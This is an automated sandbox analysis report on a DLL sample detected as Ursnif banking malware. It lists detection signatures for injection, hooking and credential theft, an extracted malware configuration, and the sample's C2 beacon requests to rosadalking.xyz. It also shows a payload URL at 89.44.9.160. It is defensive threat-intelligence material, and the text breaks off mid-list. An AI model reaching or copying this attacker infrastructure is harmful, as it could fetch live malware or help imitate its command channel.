Analysis Report 5fd9d7ec9e7aetar.dll

Overview

General Information

Sample Name: 5fd9d7ec9e7aetar.dll
Analysis ID: 331120
MD5: 7d675f9a252b26cd655607ae8b36c3e9
SHA1: 522894a5e30417192c053579d583ff7a690316a7
SHA256: 5e7f200f26fb2fc09ca80862fc6bec38f7d539aada080af6461771f9233c054f
Tags: brtdllgoziisfbursnif

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Found malware configuration
Source: loaddll32.exe.5508.0.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: rosadalking.xyz Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for submitted file
Source: 5fd9d7ec9e7aetar.dll Virustotal: Detection: 12% Perma Link
Source: 5fd9d7ec9e7aetar.dll ReversingLabs: Detection: 10%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.1500000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Spreading:

barindex
Contains functionality to get notified if a device is plugged in / out
Source: C:\Windows\explorer.exe Code function: 37_2_03B7174C RegisterDeviceNotificationA, 37_2_03B7174C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F632BA
Source: C:\Windows\explorer.exe Code function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B70180
Source: C:\Windows\explorer.exe Code function: 37_2_03B60C34 FindFirstFileW, 37_2_03B60C34
Source: C:\Windows\explorer.exe Code function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW, 37_2_03B5A85C

Networking:

barindex
Creates a COM Internet Explorer object
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler Jump to behavior
Found Tor onion address
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 216.58.210.2 216.58.210.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
Source: unknown TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: global traffic HTTP traffic detected: GET /images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/xeggxPGc7nfKRGZxkwY7m/6XO3LRBusWZ68b2Q/9CuG_2BFhJPugx2/mLb9eBF61d6PEdK9bs/54NcT0amJ/cPoLRcNqBcfX0RKHxYZO/vGw1uksCwbrdZy38AcM/QknS0Ofxufsp/AGlpBU.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rosadalking.xyzConnection: Keep-AliveCookie: PHPSESSID=ioak1ilk7vhlu36vv01oie9fv7; lang=en
Source: global traffic HTTP traffic detected: GET /images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDsy5Ztqa5MO/ZE1uNeIragrUuVu9/t1VvHxGOnUeE0N9/AofD3_2FkZDH3xF9WG/e6QRtMJki/mDfRsmXPGHOJcDq1VRhX/EAwOOQEOyOVMOCO4aMJ/IIjWmZnO6yO6LwKDQCAmcr/fLzp.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en
Source: global traffic HTTP traffic detected: GET /images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9_2B9CFok/IIciaBbavff8xIv/QDnJnQxg5GFZWds3Q4/WJYPPBvIM/fTQamjd1C8ZF4x_2BQAG/7tjeWUw0l7HYY5PaqB5/4nRQ7JoUoZ1VN0XTFxi7Cj/sa195v8n0NrfN/CyTgvxQv/A6Pn.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: rosadalking.xyz
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: http://89.44.9.160/gr32.rar
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: http://89.44.9.160/gr32.rarB
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: http://89.44.9.160/gr32.rarb
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?aa4ec0d4b8242
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: ~DF224E930954C99BCE.TMP.4.dr, {CB1D97FB-3FD1-11EB-90E5-ECF4BB570DC9}.dat.4.dr String found in binary or memory: http://firestore.googleapis.com/images/5gl1_2BhlXsWr7coQSs/4F845jkaqRiUCXeQicZCJl/ANd4nGixTqMmg/W9Sd
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: imagestore.dat.21.dr String found in binary or memory: http://rosadalking.xyz/favicon.ico
Source: imagestore.dat.21.dr String found in binary or memory: http://rosadalking.xyz/favicon.ico~
Source: {F0C73B59-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr String found in binary or memory: http://rosadalking.xyz/images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDs
